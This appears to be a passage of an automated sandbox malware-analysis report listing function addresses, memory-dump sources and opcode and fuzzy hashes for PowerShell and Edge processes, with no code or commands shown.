                                            • Instruction ID: 326014225c2d093dca8dc0ba8d6e9d60fe6802889837da8dee1cb3ecf802ad6c
                                            • Opcode Fuzzy Hash: 2cc0fa9ba8dab7deccec2b2ff4a36b0f18a6bbc8d181e13760542a4533837fff
                                            • Instruction Fuzzy Hash: 6511E372B0E6858FEBA4D72C84A45B87BD1EF06724B5800BAD15DD7293D91CBC00A381
                                            Function 00007FFD346733B5 Relevance: .0, Instructions: 49COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2477346115.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7ffd34670000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                            • Instruction ID: fbdbe5f7fa31bdb5b4d96766301e1fa8c3ecf2e6deba8f06807b4dcd50cf955b
                                            • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                            • Instruction Fuzzy Hash: 5401677121CB0C4FD754EF0CE451AA5B7E0FB95364F10056DE58AC3691DA36E892CB45

                                            Non-executed Functions

                                            Function 00007FFD34678BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2477346115.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7ffd34670000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: M_^4$M_^7$M_^F$M_^J
                                            • API String ID: 0-622050427
                                            • Opcode ID: 0952385b8bdb8dc4856a798c81327935ad6e11df2551058c8feb274a0171bac6
                                            • Instruction ID: 38742e96664be9460a50deb9f89d8f10413ba588710842848fc8c0f904a8889b
                                            • Opcode Fuzzy Hash: 0952385b8bdb8dc4856a798c81327935ad6e11df2551058c8feb274a0171bac6
                                            • Instruction Fuzzy Hash: 692104B77086658ED3127BFDB8149EA3744CFA423978503B2E198DB083FD1860868AC0

                                            Executed Functions

                                            Function 00007FFD346912D9 Relevance: .9, Instructions: 867COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.2789214967.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_7ffd34690000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ad6fc986f8a034576e9bf4e1a99370fc286ebbb443b37b43fa37f22866987ac7
                                            • Instruction ID: 801afc691ec4cee512c3affff126c17ceb82b84b6d81bd43f5956899ec52c3ff
                                            • Opcode Fuzzy Hash: ad6fc986f8a034576e9bf4e1a99370fc286ebbb443b37b43fa37f22866987ac7
                                            • Instruction Fuzzy Hash: D352D361B18A594FEBA8EB6884B53FDB7D2FF99300F54057DE04EC32D2DE68A8418741
                                            Function 00007FFD34691D49 Relevance: .2, Instructions: 197COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.2789214967.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_7ffd34690000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 200d644ca05818e01b3ee3b3bb59307a0619f156bbc8ed7345e582daed920b85
                                            • Instruction ID: 8e8aa7d129d7342c5f0f672ca5d5421842db4ddf5a430e63e23ef9e4c4014fa6
                                            • Opcode Fuzzy Hash: 200d644ca05818e01b3ee3b3bb59307a0619f156bbc8ed7345e582daed920b85
                                            • Instruction Fuzzy Hash: 2551FF21B1E6C90FE796ABB848752B5BFD5DF87216B1804FFE0C9C61A3DD585806C342
                                            Function 00007FFD34690C4E Relevance: .8, Instructions: 767COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.2789214967.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_7ffd34690000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a8e6290b3c687636edeaf3916f6689141a3409757ea65d6f58a414bc6fbfc744
                                            • Instruction ID: 2b62b8a5cd4c40b6d7e651cd9a378be94cc8077a1908f499c12a72eeeb0a6d89
                                            • Opcode Fuzzy Hash: a8e6290b3c687636edeaf3916f6689141a3409757ea65d6f58a414bc6fbfc744
                                            • Instruction Fuzzy Hash: 80912922B1DA9A0FE756AB7C98B51F93BE1EF87211B0800BBD189C71A3DD5C68468351
                                            Function 00007FFD346904E8 Relevance: .1, Instructions: 139COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.2789214967.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_7ffd34690000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8f3a74ef495120f3d1e45e1310898a7b03c5493960040c5f85ee2dde74b326d1
                                            • Instruction ID: 69d6cbbab2c93ac50815bb50d4cda2f7b6566ae992d400277980913d47a40281
                                            • Opcode Fuzzy Hash: 8f3a74ef495120f3d1e45e1310898a7b03c5493960040c5f85ee2dde74b326d1
                                            • Instruction Fuzzy Hash: 9F31A621B1D9490FF798FA6C946A2B9B7C2EF99316F1405BEE04EC3293DD68AC418341
                                            Function 00007FFD34690AE1 Relevance: .1, Instructions: 121COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.2789214967.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_7ffd34690000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: eceb83a4f91296ffd7e769f9b216da2a70cef2f9ba9fee9ec52ef26c3cc667e4
                                            • Instruction ID: 8b7cee4135f4c6bad19a491c289d78d9044207ac1b2ed366f7c77ad504511260
                                            • Opcode Fuzzy Hash: eceb83a4f91296ffd7e769f9b216da2a70cef2f9ba9fee9ec52ef26c3cc667e4
                                            • Instruction Fuzzy Hash: 8131D621B18E554BE754BBFC88693FEB6D5EFA9301F54017AE00DC32E2DE2868418791
                                            Function 00007FFD34690999 Relevance: .1, Instructions: 110COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.2789214967.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_7ffd34690000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 30a599ce6c3589d0c3080a51884d8af7043d72358438e5069389128009002663
                                            • Instruction ID: 5dc3e9eb9a462244f3d7bf36318a31f31a012dd78245b98933cdbc62c89e395e
                                            • Opcode Fuzzy Hash: 30a599ce6c3589d0c3080a51884d8af7043d72358438e5069389128009002663
                                            • Instruction Fuzzy Hash: C8419F31B18A5E8FEB44EBA8C4756EEBBA1FF99301F540579D009D32C6CE786841C740
                                            Function 00007FFD34690879 Relevance: .1, Instructions: 80COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.2789214967.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_7ffd34690000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4a53dea06a55216be889fd4a672981872bc196bff973ea36a85ff67b917f19b4
                                            • Instruction ID: ea3fad731278fd8a654fb38b6876143e2df110dc61145673888d03e2b650854f
                                            • Opcode Fuzzy Hash: 4a53dea06a55216be889fd4a672981872bc196bff973ea36a85ff67b917f19b4
                                            • Instruction Fuzzy Hash: C731CE20B5970E4FD755EFACD0B06AC7FB5AF88205BA444A9E44EC33C6DE247840C751
                                            Function 00007FFD34691F01 Relevance: .0, Instructions: 48COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.2789214967.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_7ffd34690000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1ed241dd319cad67c4533075ea366b832d6a7958499b612f0905c63ae073db5b
                                            • Instruction ID: dc3fa5fbc65fb0d53d2630d338f1ba476cb953bc1ac447b0ecb3ad9b148063b6
                                            • Opcode Fuzzy Hash: 1ed241dd319cad67c4533075ea366b832d6a7958499b612f0905c63ae073db5b
                                            • Instruction Fuzzy Hash: 93014752E0DBD50EF781AF3858B10B53FE09BD2260B1806BBE48CC60E7DA486A418352

                                            Executed Functions

                                            Function 00007FFD346812D9 Relevance: .9, Instructions: 865COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.2858330350.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_19_2_7ffd34680000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 739b92926f089b209f8891955b5143fffa1766a637fc8f206645579c733fb943
                                            • Instruction ID: 2d5a7bb1fca01732c5bde5664523204c11f1a8e43e141e6178af5ad837b15cca
                                            • Opcode Fuzzy Hash: 739b92926f089b209f8891955b5143fffa1766a637fc8f206645579c733fb943
                                            • Instruction Fuzzy Hash: 9E52E261B58B594FEBE8EF6884B66F973D2EF99314F840579E44EC32C3DD28A8018741
                                            Function 00007FFD34681D49 Relevance: .2, Instructions: 197COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.2858330350.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_19_2_7ffd34680000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5d9782796a8a16a9178841b7017dff5be1bdb077ac80c918ca99cd5b6429a97b
                                            • Instruction ID: c56a18b4485521ea1ded804d32bb03d0755fbc986b7bf8aae07b6b626aa6f235
                                            • Opcode Fuzzy Hash: 5d9782796a8a16a9178841b7017dff5be1bdb077ac80c918ca99cd5b6429a97b
                                            • Instruction Fuzzy Hash: B751FF21B1E6C90FE796AB7858752B5BFD5DF87216B0805FFE0C9C61A3DD085806C342
                                            Function 00007FFD34680C4E Relevance: .8, Instructions: 770COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.2858330350.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_19_2_7ffd34680000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 572681aae3536217d223fef365c2ba41ee545c2f0a0a92993d97153f565e0b12
                                            • Instruction ID: 2ab653eb12b7b9ce130b2452bb9d1d829d6e16e54248b6ae438516ded5e6a8f4
                                            • Opcode Fuzzy Hash: 572681aae3536217d223fef365c2ba41ee545c2f0a0a92993d97153f565e0b12
                                            • Instruction Fuzzy Hash: 15914821B0DB9A0FE796AB7C88B61F97BE1EF96211B0801FBD48DC7193DD1C68468351
                                            Function 00007FFD346804E8 Relevance: .1, Instructions: 139COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.2858330350.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_19_2_7ffd34680000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: efb6dad25b1a78584af9c849fe27d5320b64fb6ee260eb29d9cebbd0d1de3f5c
                                            • Instruction ID: 47b9435e5145ab6d4a8635ba1a2d20d10888fc9b15622db7a4deedd4d915fa28
                                            • Opcode Fuzzy Hash: efb6dad25b1a78584af9c849fe27d5320b64fb6ee260eb29d9cebbd0d1de3f5c
                                            • Instruction Fuzzy Hash: 0C317721B1D9490FE798FA6C946A2B9B7C2EFD9316F0405BEE44EC3293DD68AC418341
                                            Function 00007FFD34680AE1 Relevance: .1, Instructions: 124COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.2858330350.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_19_2_7ffd34680000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b5b29fb33c0d2b148201fbcd06bd32a1d04cb8aaced07c85f00d3fa4ab46d5ad
                                            • Instruction ID: 8d0274b767d7ad5f75e9afb6cdc7ffaea41474d7cf7a00f240792fd8e7d1ccf9
                                            • Opcode Fuzzy Hash: b5b29fb33c0d2b148201fbcd06bd32a1d04cb8aaced07c85f00d3fa4ab46d5ad
                                            • Instruction Fuzzy Hash: 5431C721B19A594FEB94BBFC88693BE77D5EFA9701F14027AE00DD32D3DD28A8018751
                                            Function 00007FFD34680999 Relevance: .1, Instructions: 111COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.2858330350.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_19_2_7ffd34680000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e59f838ed5170d4d9273590b39ba116a9fb6a3d690cd5a023c77f4a6cec56635
                                            • Instruction ID: 2766bb6421a1dfc2a551a2d425292c885bfda2229697405e97cc34ff8fd63b47
                                            • Opcode Fuzzy Hash: e59f838ed5170d4d9273590b39ba116a9fb6a3d690cd5a023c77f4a6cec56635
                                            • Instruction Fuzzy Hash: AA41A270B58B5A4FEB84EBA8C4A56EA77E1FF98304F950579D009D3283CD3868058B40
                                            Function 00007FFD34680818 Relevance: .1, Instructions: 92COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.2858330350.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_19_2_7ffd34680000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c20dad8b6bdfb58e90746adcc4bb41085917824bcbed43c5f9978ae410f81e9e
                                            • Instruction ID: 8be6a4c4135df343a7a0ba625c5883fef3769711b2c36d151ab5964bc52e4402
                                            • Opcode Fuzzy Hash: c20dad8b6bdfb58e90746adcc4bb41085917824bcbed43c5f9978ae410f81e9e
                                            • Instruction Fuzzy Hash: 1631F2317D874A5BD791FBA8D0E65F93BA1EF94228BC04678D84EC3387DE2468018B41
                                            Function 00007FFD34680870 Relevance: .1, Instructions: 79COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.2858330350.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_19_2_7ffd34680000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dcc82695549b8c650489a627566ab3da12b4c893b0c89def84a9b55080b2a43d
                                            • Instruction ID: 37f9ff996815c3c22f656e2b844b57b70e2f5b113056feb16dc5c6ef5a2919a8
                                            • Opcode Fuzzy Hash: dcc82695549b8c650489a627566ab3da12b4c893b0c89def84a9b55080b2a43d
                                            • Instruction Fuzzy Hash: 3331C2207D87895FD392EFA8D0E56F93FB1EF98218BC045A9D84EC3397DE2469048B51
                                            Function 00007FFD34681F01 Relevance: .0, Instructions: 48COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.2858330350.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_19_2_7ffd34680000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3973c04ed7a18141cdf6962aad89ad1e6d6009c2ef637c6f8a2f86fdae6c5139
                                            • Instruction ID: a55ff78f871464221e6ecb5b1ffeedc61af437e940b80d1dd86be5d2f678b306
                                            • Opcode Fuzzy Hash: 3973c04ed7a18141cdf6962aad89ad1e6d6009c2ef637c6f8a2f86fdae6c5139
                                            • Instruction Fuzzy Hash: 33014751A0CBD10FE7C2AB3858A10F13FE09FD2260B0806BBE88CC60E3D908A9458342

                                            Executed Functions

                                            Function 00007FFD346912D9 Relevance: .9, Instructions: 867COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2942562289.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_7ffd34690000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3c802cca9b3fce1c1b8488008fdc8d0bf7a59ee78eb25c9c8953a295650d55d8
                                            • Instruction ID: 2b34c3d9cb91c443a8abecd4e26f598f1e10bbb160ed8637b56f9e0b928122ea
                                            • Opcode Fuzzy Hash: 3c802cca9b3fce1c1b8488008fdc8d0bf7a59ee78eb25c9c8953a295650d55d8
                                            • Instruction Fuzzy Hash: 9E52D461B18A194FEBA4FB6884B93F977D2FF99300F54057DE04EC32D6DE68A8428741
                                            Function 00007FFD34691D49 Relevance: .2, Instructions: 197COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2942562289.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_7ffd34690000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1ade26dea2e5b6ce37f935c397327e03108044fe5b87e82c27d3fad6b5ad7a21
                                            • Instruction ID: a75887da9b09ebdc6d955fa61c751f68a1a4ed37c2c3b696187ed881e691d29b
                                            • Opcode Fuzzy Hash: 1ade26dea2e5b6ce37f935c397327e03108044fe5b87e82c27d3fad6b5ad7a21
                                            • Instruction Fuzzy Hash: B451FF21B1E6C50FE796ABB848752B5BFD5DF87216B1804FFE0C9C61A3DD585806C342
                                            Function 00007FFD34690C4E Relevance: .8, Instructions: 767COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2942562289.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_7ffd34690000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: af11be0e2e85095df22228e97ad17857eabb524c50609de3ee9c79d7e34472d3
                                            • Instruction ID: c61dab9f46c9f73c26e849a59a452f4e1d4813e7d277266ebd502cf4652c97ec
                                            • Opcode Fuzzy Hash: af11be0e2e85095df22228e97ad17857eabb524c50609de3ee9c79d7e34472d3
                                            • Instruction Fuzzy Hash: 00914D21B1DA9A0FE755AB7C98B61F93BE1EF87211B0400BBD08DC71A3DD5C68468351
                                            Function 00007FFD346904E8 Relevance: .1, Instructions: 139COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2942562289.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_7ffd34690000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ab75423b79a9c29823944103c8571c968b08355e952747212de81851fe3c2bda
                                            • Instruction ID: 957bca037defaa29c014dd148f0d68379fb520e0aa0c2193dff04619c089a158
                                            • Opcode Fuzzy Hash: ab75423b79a9c29823944103c8571c968b08355e952747212de81851fe3c2bda
                                            • Instruction Fuzzy Hash: 7131A821B1C9490FF798FA6C946A2B9B7C2EF99315F1405BEE04EC3293DD68AC418341
                                            Function 00007FFD34690AE1 Relevance: .1, Instructions: 121COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2942562289.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_7ffd34690000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: eceb83a4f91296ffd7e769f9b216da2a70cef2f9ba9fee9ec52ef26c3cc667e4
                                            • Instruction ID: 8b7cee4135f4c6bad19a491c289d78d9044207ac1b2ed366f7c77ad504511260
                                            • Opcode Fuzzy Hash: eceb83a4f91296ffd7e769f9b216da2a70cef2f9ba9fee9ec52ef26c3cc667e4
                                            • Instruction Fuzzy Hash: 8131D621B18E554BE754BBFC88693FEB6D5EFA9301F54017AE00DC32E2DE2868418791
                                            Function 00007FFD34690999 Relevance: .1, Instructions: 110COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2942562289.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_7ffd34690000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e9400c25a310b52f6b1ccb5c2884951435303be5ab9e22e9555a53bbfd663c67
                                            • Instruction ID: 3bfb329ebe6885d5517259e1dc7ffdbea74f4eb79f78caa04ce51f8eb9be3595
                                            • Opcode Fuzzy Hash: e9400c25a310b52f6b1ccb5c2884951435303be5ab9e22e9555a53bbfd663c67
                                            • Instruction Fuzzy Hash: 6D419335B18A5A4FEB45FBA8C4796EA7BA1FF99300F944579D009E3286CE396841CB40
                                            Function 00007FFD34690879 Relevance: .1, Instructions: 80COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2942562289.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_7ffd34690000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a1a0a3c75a5309d39a97e9023762a8289282a698f716c21033f3cb28e6e6ab3c
                                            • Instruction ID: 0f470fe0e84c2927f563b94676e62346c0ddea732254d9f8cba5c9045d62bd2e
                                            • Opcode Fuzzy Hash: a1a0a3c75a5309d39a97e9023762a8289282a698f716c21033f3cb28e6e6ab3c
                                            • Instruction Fuzzy Hash: 1131D120B5870A4FD715FBD8E0BA6AA3F62FF98204BC085A5D44DC338ADD346882CB55
                                            Function 00007FFD34691F01 Relevance: .0, Instructions: 48COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2942562289.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_7ffd34690000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ef12ebb75a54744c92ade191fdf133938a512d26874fec0bf3360503fe140539
                                            • Instruction ID: ec34bfb6fc4b0c9f469ed9d165435dee2399b4aa13f5967819f858c1dc29d0bd
                                            • Opcode Fuzzy Hash: ef12ebb75a54744c92ade191fdf133938a512d26874fec0bf3360503fe140539
                                            • Instruction Fuzzy Hash: 26014752A0CBD50EF781AF3858A10F13FE09BD2260B1806BBE48CC60E7D94869428352

                                            Executed Functions

                                            Function 00007FFD346712D9 Relevance: .9, Instructions: 868COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.3316014319.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_7ffd34670000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4827baa710db57f498913afa4818607e7425d135799ba16f48aeff8c9dc1025d
                                            • Instruction ID: 0005e4048dea5f2a832e1ca084cd9724fc7cf9e5e3658248a3b80a749edf4d79
                                            • Opcode Fuzzy Hash: 4827baa710db57f498913afa4818607e7425d135799ba16f48aeff8c9dc1025d
                                            • Instruction Fuzzy Hash: 8352C571B18A594FEBA4EB7884B93B9B7D2FF99300F44457DE04EC32D6DE28A8018741
                                            Function 00007FFD34671D49 Relevance: .2, Instructions: 197COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.3316014319.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_7ffd34670000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9f803c3f176070ca56a7a3023373b10ae51653b3a9c54642d318a0e59b819439
                                            • Instruction ID: 391b21d5e184ae3422905d9aa600174e17229480fd0732ec5926a0d623d5bdac
                                            • Opcode Fuzzy Hash: 9f803c3f176070ca56a7a3023373b10ae51653b3a9c54642d318a0e59b819439
                                            • Instruction Fuzzy Hash: 2351FF21B1E6C90FE796ABB858752B5BFD1DF87216B0844FFE0C9C62A3DD185806C342
                                            Function 00007FFD34670C4E Relevance: .8, Instructions: 770COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.3316014319.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_7ffd34670000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 03d5c0e888b861e0c45a2e2fd2cca741f98e72cb745855d2253ba9c154e75341
                                            • Instruction ID: 9a819a50aae2359102ffc099d34c37e7db41c12fb0247c885e90706bd3d8f784
                                            • Opcode Fuzzy Hash: 03d5c0e888b861e0c45a2e2fd2cca741f98e72cb745855d2253ba9c154e75341
                                            • Instruction Fuzzy Hash: 97913721B0DB9A0FE756AB7C88B51F97FE1EF86210B0440BBD189C7293DD1CA8468361
                                            Function 00007FFD346704E8 Relevance: .1, Instructions: 139COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.3316014319.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_7ffd34670000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fa0e656c65fd8fdb1075955ad3ee4aacf31a02355dce0823376c478100fc54f7
                                            • Instruction ID: bd8d51f979ccc0b1204df4d71458ca0014fe944570256ea1734c4a3a40a90857
                                            • Opcode Fuzzy Hash: fa0e656c65fd8fdb1075955ad3ee4aacf31a02355dce0823376c478100fc54f7
                                            • Instruction Fuzzy Hash: 7C31A821B1D9490FE798FA6C986A2B9B7C2EF99356F0405BFE04EC3393DD689C018341
                                            Function 00007FFD34670AE1 Relevance: .1, Instructions: 124COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.3316014319.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_7ffd34670000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: aaaaa10bf4db1411733e8db9eaf10f3afebd011010e1b4b4389c1be5a20a251f
                                            • Instruction ID: 4e262da951acd837b8c24c2cd531908c848b2b5e4c688312abb4ec0d5622bf68
